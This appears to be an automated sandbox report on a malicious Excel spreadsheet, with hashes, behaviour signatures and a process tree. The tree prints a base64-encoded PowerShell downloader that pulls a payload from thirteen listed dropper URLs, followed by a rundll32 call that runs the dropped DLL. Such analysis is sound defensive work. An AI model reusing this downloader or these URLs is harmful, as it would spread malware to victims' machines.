Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 22:51

General

  • Target

    5dd7cf684929ca3a2dea93934e7685efa18394eb07b64fae4bf03e3239e3cdc9.xls

  • Size

    121KB

  • MD5

    2bf4037dc83d399f5533e984f6a235f0

  • SHA1

    4c047e262ebaa6971925b01d08097235124826e0

  • SHA256

    5dd7cf684929ca3a2dea93934e7685efa18394eb07b64fae4bf03e3239e3cdc9

  • SHA512

    f9f3cbb54d94312041b0e3c19e5ac1e401f9c7f7ca8e002a4d2ae92e70d34b603b7bba4238949ff25e44a74142672b3c67ba37adc55740f33a4f5e88c0812b88

  • SSDEEP

    3072:jlcKoSsxzNDZLDZjlbR868O8KlVH37kehvMqAPjxO5xyZUE5V5xtezEVg8/dgGBW:JcKoSsxzNDZLDZjlbR868O8KlVH37ken

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://alivesystems.com/eln-images/pm2rSsnVM/

exe.dropper

http://don-lee.com/_notes/U6H14DNA/

exe.dropper

http://mellow60s.com/Stanley_files/EFIqwZ183rfmd/

exe.dropper

http://pro-ficientllc.com/PDF_files/5A9W8/

exe.dropper

http://lost-earth.com/Black_and_White/ZW4rHEdD1vZX/

exe.dropper

http://creedmoorpartners.com/eln-images/wEYKd5KJZETheBswq/

exe.dropper

http://mattersoffact.com/cgi/E0C1vtSqt/

exe.dropper

http://pureplatinumband.com/Schedule/EW24AYJCvBpN8Gc/

exe.dropper

http://homehandyworks.com/eln-images/xFIDPfs4SS1yw7ghXXk/

exe.dropper

http://hi-techaudio.com/dir2021/g3d/

exe.dropper

http://roderickpowellentertainment.com/eln-images/OVOyN3y9/

exe.dropper

https://consciences.center/wp-includes/SkW2w/

exe.dropper

http://mag-designs.com/css/L3QKlr6iTzILVzbnC/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5dd7cf684929ca3a2dea93934e7685efa18394eb07b64fae4bf03e3239e3cdc9.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1416
    • C:\Windows\SysWOW64\wscript.exe
      wscript c:\programdata\tjspowj.vbs
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1960
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\programdata\uidpjewl.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAGEAbABpAHYAZQBzAHkAcwB0AGUAbQBzAC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8AcABtADIAcgBTAHMAbgBWAE0ALwAsAGgAdAB0AHAAOgAvAC8AZABvAG4ALQBsAGUAZQAuAGMAbwBtAC8AXwBuAG8AdABlAHMALwBVADYASAAxADQARABOAEEALwAsAGgAdAB0AHAAOgAvAC8AbQBlAGwAbABvAHcANgAwAHMALgBjAG8AbQAvAFMAdABhAG4AbABlAHkAXwBmAGkAbABlAHMALwBFAEYASQBxAHcAWgAxADgAMwByAGYAbQBkAC8ALABoAHQAdABwADoALwAvAHAAcgBvAC0AZgBpAGMAaQBlAG4AdABsAGwAYwAuAGMAbwBtAC8AUABEAEYAXwBmAGkAbABlAHMALwA1AEEAOQBXADgALwAsAGgAdAB0AHAAOgAvAC8AbABvAHMAdAAtAGUAYQByAHQAaAAuAGMAbwBtAC8AQgBsAGEAYwBrAF8AYQBuAGQAXwBXAGgAaQB0AGUALwBaAFcANAByAEgARQBkAEQAMQB2AFoAWAAvACwAaAB0AHQAcAA6AC8ALwBjAHIAZQBlAGQAbQBvAG8AcgBwAGEAcgB0AG4AZQByAHMALgBjAG8AbQAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwB3AEUAWQBLAGQANQBLAEoAWgBFAFQAaABlAEIAcwB3AHEALwAsAGgAdAB0AHAAOgAvAC8AbQBhAHQAdABlAHIAcwBvAGYAZgBhAGMAdAAuAGMAbwBtAC8AYwBnAGkALwBFADAAQwAxAHYAdABTAHEAdAAvACwAaAB0AHQAcAA6AC8ALwBwAHUAcgBlAHAAbABhAHQAaQBuAHUAbQBiAGEAbgBkAC4AYwBvAG0ALwBTAGMAaABlAGQAdQBsAGUALwBFAFcAMgA0AEEAWQBKAEMAdgBCAHAATgA4AEcAYwAvACwAaAB0AHQAcAA6AC8ALwBoAG8AbQBlAGgAYQBuAGQAeQB3AG8AcgBrAHMALgBjAG8AbQAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwB4AEYASQBEAFAAZgBzADQAUwBTADEAeQB3ADcAZwBoAFgAWABrAC8ALABoAHQAdABwADoALwAvAGgAaQAtAHQAZQBjAGgAYQB1AGQAaQBvAC4AYwBvAG0ALwBkAGkAcgAyADAAMgAxAC8AZwAzAGQALwAsAGgAdAB0AHAAOgAvAC8AcgBvAGQAZQByAGkAYwBrAHAAbwB3AGUAbABsAGUAbgB0AGUAcgB0AGEAaQBuAG0AZQBuAHQALgBjAG8AbQAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwBPAFYATwB5AE4AMwB5ADkALwAsAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBzAGMAaQBlAG4AYwBlAHMALgBjAGUAbgB0AGUAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFMAawBXADIAdwAvACwAaAB0AHQAcAA6AC8ALwBtAGEAZwAtAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGMAcwBzAC8ATAAzAFEASwBsAHIANgBpAFQAegBJAEwAVgB6AGIAbgBDAC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApACAAewAkAEcAdwBlAFkASAA1ADcAcwBlAGQAcwB3AGQAPQAoACIAYwBpAHUAdwBkADoAaQB1AHcAZABcAHAAcgBpAHUAdwBkAG8AZwBpAHUAdwBkAHIAYQBtAGkAdQB3AGQAZABhAHQAaQB1AHcAZABhAFwAcAB1AGkAaABvAHUAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2824
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1432
        • \??\c:\windows\syswow64\rundll32.exe
          c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\programdata\uidpjewl.bat

    Filesize

    3KB

    MD5

    ee39cb33b8ab709959b2eb524c37e4df

    SHA1

    adb6601cc966c1fdd798945fd675f3611d5496e6

    SHA256

    c7bd5c4017c3c585280b5cb00dc96883f19f06ede2401c013142e7f8f46dd593

    SHA512

    74b6c0ef2bf6e4b6e1ee04063c1cffb265d66c572b6c8af536db40cc42eaa9cf833fd503aae9e0c577622ffca3d7a854989d271edbdbaa5b12238da17b5b9497

  • \??\c:\programdata\tjspowj.vbs

    Filesize

    689B

    MD5

    24a3cd3164d4db5a47b7a321aa51b0c6

    SHA1

    eb7277f82001af340b6404300465629b19811c3a

    SHA256

    5eed2cdac8033b25525f9240c83f793f12e606451298bb314ab4b40af62f08a2

    SHA512

    3ed236cd1bfa2283eec0443dcabd602fc100a2b4c38b60aa9ab99d769dc61f115032686b5572db16e98b9ecb44a94053eb9f0a9b46e94a854217311d0076c8e2

  • memory/1416-1-0x000000007248D000-0x0000000072498000-memory.dmp

    Filesize

    44KB

  • memory/1416-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1416-2-0x00000000065F0000-0x00000000066F0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-8-0x00000000061C0000-0x00000000062C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-23-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-19-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-20-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-22-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-21-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-66-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-52-0x00000000061C0000-0x00000000062C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-50-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-51-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-49-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-48-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-47-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-46-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-45-0x00000000061C0000-0x00000000062C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-83-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-59-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-43-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-26-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-25-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-24-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-94-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-62-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-69-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-84-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-99-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-98-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-97-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-96-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-95-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-91-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-82-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-81-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-79-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-78-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-76-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-68-0x00000000061C0000-0x00000000062C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-67-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-65-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-64-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-63-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-61-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-104-0x000000007248D000-0x0000000072498000-memory.dmp

    Filesize

    44KB

  • memory/1416-106-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-105-0x00000000061C0000-0x00000000062C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-107-0x00000000061C0000-0x00000000062C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-108-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-109-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB

  • memory/1416-110-0x00000000003C0000-0x00000000004C0000-memory.dmp

    Filesize

    1024KB